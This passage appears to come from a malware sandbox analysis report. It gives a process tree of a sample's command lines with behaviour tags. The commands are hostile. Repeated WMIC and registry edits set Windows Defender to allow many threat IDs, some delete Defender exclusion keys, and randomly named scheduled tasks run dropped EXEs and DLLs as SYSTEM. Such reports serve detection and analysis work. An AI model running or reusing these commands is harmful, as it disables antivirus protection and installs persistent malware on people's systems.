C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:18756
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:16928 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:17284
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:325⤵PID:17508
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:644⤵PID:17904
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:324⤵PID:17984
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:644⤵PID:16264
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:324⤵PID:17940
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:644⤵PID:18124
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:324⤵PID:18224
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:644⤵PID:6116
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵PID:12476
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵PID:11716
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:324⤵PID:18496
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:644⤵PID:18532
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:324⤵PID:18596
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:644⤵PID:18608
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵PID:19044
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵PID:11600
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:324⤵PID:17892
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:644⤵PID:4508
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:324⤵PID:13472
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:644⤵PID:10844
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:324⤵PID:19356
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:644⤵PID:18752
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:324⤵PID:8052
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:644⤵PID:18756
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wovemSUpOFDwVyMam" /SC once /ST 00:26:44 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\USNydSz.exe\" 4h /site_id 668658 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:11936 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "wovemSUpOFDwVyMam"3⤵PID:18828
-
C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\gCRvjRb.exeC:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\gCRvjRb.exe 4h /site_id 668658 /S2⤵
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
PID:17128 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:17268
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:17568
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:16592
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:17624 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:18216
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:10420
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:17180
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:14656
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:11456
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:18088
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:18576
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:18528
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Modifies data under HKEY_USERS
PID:13472 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:12156
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bEwGusBEGbIeKSSfjR"3⤵PID:18276
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:18416
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:18492
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:18552
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:18824
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TdgVoScrU\eBdHDq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "xSbgDCImQNdWYmB" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:6160 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xSbgDCImQNdWYmB2" /F /xml "C:\Program Files (x86)\TdgVoScrU\XWmwawu.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:7504 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "xSbgDCImQNdWYmB"3⤵PID:11876
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xSbgDCImQNdWYmB"3⤵PID:10036
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FzvIgGdeRLcgbM" /F /xml "C:\Program Files (x86)\xmhVlMznYVRU2\SCroPrS.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:11580 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rRYXbmmYjIvrG2" /F /xml "C:\ProgramData\mrnDKDtAoCXFymVB\lEUnNru.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:10672 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DVpMShOGhTVXDiVCZ2" /F /xml "C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\dXZipRN.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:10996 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LdVsjAprHUXUOtSHAnG2" /F /xml "C:\Program Files (x86)\FAROrqqmwDJuC\rzJfHCg.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:8936 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lDWDrPZYJQBuPmKYQ" /SC once /ST 12:26:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\fIDQkgvqEeYuFUPy\XiOEFUDs\hZTBWZO.dll\",#1 /site_id 668658" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:13200 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "lDWDrPZYJQBuPmKYQ"3⤵PID:9804
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spummIlXAdpq" /SC once /ST 19:28:51 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\zGfATNLg\NYaOvet.exe\" RA /S"3⤵
- Creates scheduled task(s)
PID:17252 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spummIlXAdpq"3⤵PID:13620
-
C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\USNydSz.exeC:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\USNydSz.exe 4h /site_id 668658 /S2⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in Program Files directory
PID:12068 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:10596
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:10976
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:1464
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:19048 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:8048
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:10424
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:15296
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7828 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:8524
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
- Loads dropped DLL
PID:11204 -
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:14612
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Modifies data under HKEY_USERS
PID:16716 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:18048
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:9528
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:19316
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
PID:11492 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:12796
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bEwGusBEGbIeKSSfjR"3⤵PID:7744
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:8804
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:4964
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:10504
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:6388
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TdgVoScrU\wMaCDE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "xSbgDCImQNdWYmB" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:11260 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xSbgDCImQNdWYmB2" /F /xml "C:\Program Files (x86)\TdgVoScrU\rBozWuM.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:6480 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "xSbgDCImQNdWYmB"3⤵PID:8848
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xSbgDCImQNdWYmB"3⤵PID:10408
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FzvIgGdeRLcgbM" /F /xml "C:\Program Files (x86)\xmhVlMznYVRU2\qGspXwE.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:13328 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:10608
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rRYXbmmYjIvrG2" /F /xml "C:\ProgramData\mrnDKDtAoCXFymVB\bXpZfqi.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:12112 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DVpMShOGhTVXDiVCZ2" /F /xml "C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\pNKBWUu.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:13592 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LdVsjAprHUXUOtSHAnG2" /F /xml "C:\Program Files (x86)\FAROrqqmwDJuC\MSPKFlJ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:8596 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuMTubdtfoo" /SC once /ST 08:36:54 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\GebyjqhU\vuUZBai.exe\" RA /S"3⤵
- Creates scheduled task(s)
PID:13932 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuMTubdtfoo"3⤵PID:13288
-
